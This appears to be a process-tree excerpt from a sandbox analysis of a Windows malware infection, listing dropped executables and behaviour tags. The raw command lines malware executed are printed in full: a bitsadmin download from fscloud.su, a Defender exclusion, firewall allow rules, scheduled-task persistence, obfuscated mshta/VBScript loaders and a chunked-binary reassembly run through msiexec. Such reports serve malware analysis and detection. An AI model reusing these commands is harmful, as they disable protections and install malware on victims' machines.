C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\oyUPf1tOtiNIPxx3GV9BGX_U.exe"C:\Users\Admin\Pictures\Adobe Films\oyUPf1tOtiNIPxx3GV9BGX_U.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\MbAulC41IUPtgTysOqxTGnoL.exe"C:\Users\Admin\Pictures\Adobe Films\MbAulC41IUPtgTysOqxTGnoL.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\5166190.exe"C:\Users\Admin\AppData\Roaming\5166190.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3931810.exe"C:\Users\Admin\AppData\Roaming\3931810.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1001385.exe"C:\Users\Admin\AppData\Roaming\1001385.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4040985.exe"C:\Users\Admin\AppData\Roaming\4040985.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4795979.exe"C:\Users\Admin\AppData\Roaming\4795979.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\3Epq67p4ckusTei5nXzNLNK0.exe"C:\Users\Admin\Pictures\Adobe Films\3Epq67p4ckusTei5nXzNLNK0.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\QYUmrdKRz8BDDtM93WnnT1fs.exe"C:\Users\Admin\Pictures\Adobe Films\QYUmrdKRz8BDDtM93WnnT1fs.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 2963⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\2cueFNHmLXQajzNJ90hDfGNw.exe"C:\Users\Admin\Pictures\Adobe Films\2cueFNHmLXQajzNJ90hDfGNw.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 2963⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\4aT3PF6SgnV8ZkLFpRL7NRID.exe"C:\Users\Admin\Pictures\Adobe Films\4aT3PF6SgnV8ZkLFpRL7NRID.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\RvxGhnQ_OEMC18xXwR0VxQcn.exe"C:\Users\Admin\Pictures\Adobe Films\RvxGhnQ_OEMC18xXwR0VxQcn.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\CPrpRnM8IeYXmA2gAu6BvtNE.exe"C:\Users\Admin\Pictures\Adobe Films\CPrpRnM8IeYXmA2gAu6BvtNE.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Users\Admin\Pictures\Adobe Films\Ctryp2hRVmlso4rkGtOzVamP.exe"C:\Users\Admin\Pictures\Adobe Films\Ctryp2hRVmlso4rkGtOzVamP.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exe"C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exe"C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\UqjuQ1dgHGsSiPLUpbp52GVy.exe"C:\Users\Admin\Pictures\Adobe Films\UqjuQ1dgHGsSiPLUpbp52GVy.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\H9aHWEApAVLTEbLrPMUXwkhu.exe"C:\Users\Admin\Pictures\Adobe Films\H9aHWEApAVLTEbLrPMUXwkhu.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\koWWz0CDL9D_1Drwoq08LvCC.exe"C:\Users\Admin\Pictures\Adobe Films\koWWz0CDL9D_1Drwoq08LvCC.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 16683⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\vB85CLYRioIwOWyvE81XtmUq.exe"C:\Users\Admin\Pictures\Adobe Films\vB85CLYRioIwOWyvE81XtmUq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4042726.exe"C:\Users\Admin\AppData\Roaming\4042726.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5749535.exe"C:\Users\Admin\AppData\Roaming\5749535.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7151052.exe"C:\Users\Admin\AppData\Roaming\7151052.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\250740.exe"C:\Users\Admin\AppData\Roaming\250740.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5515576.exe"C:\Users\Admin\AppData\Roaming\5515576.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2074177.exe"C:\Users\Admin\AppData\Roaming\2074177.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe"C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "U6DuogN1ECFWruE4A0SlHzun.exe" -F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exe"C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffcc883dec0,0x7ffcc883ded0,0x7ffcc883dee05⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:25⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=1936 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=2232 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2568 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2616 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=2636 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3252 /prefetch:25⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=3400 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=1500 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=1644 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=3360 /prefetch:85⤵
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv vtqxg/3+ekOudJ78lsMB4g.01⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv lX+JvkxKV0GZd+6TsanO5Q.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1244 -ip 12441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1744 -ip 17441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3036 -ip 30361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1284 -ip 12841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1552 -ip 15521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5648 -ip 56481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5712 -ip 57121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5328 -ip 53281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\38C4.exeC:\Users\Admin\AppData\Local\Temp\38C4.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\38C4.exeC:\Users\Admin\AppData\Local\Temp\38C4.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\66CA.exeC:\Users\Admin\AppData\Local\Temp\66CA.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 2922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7C18.exeC:\Users\Admin\AppData\Local\Temp\7C18.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\99B3.exeC:\Users\Admin\AppData\Local\Temp\99B3.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\C161.exeC:\Users\Admin\AppData\Local\Temp\C161.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 2722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\D5C4.exeC:\Users\Admin\AppData\Local\Temp\D5C4.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6844 -s 2802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3036 -ip 30361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4668 -ip 46681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AEE2B3E6B6325CC75D395BBA30276434 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 30B788BA6E1B47198E49D3ABE38D2DC42⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2BC80075FAF964A4AC1D79FC4E7AFA7F E Global\MSI00002⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 8842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 6844 -ip 68441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7492 -ip 74921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\29E1.exeC:\Users\Admin\AppData\Local\Temp\29E1.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"2⤵
-
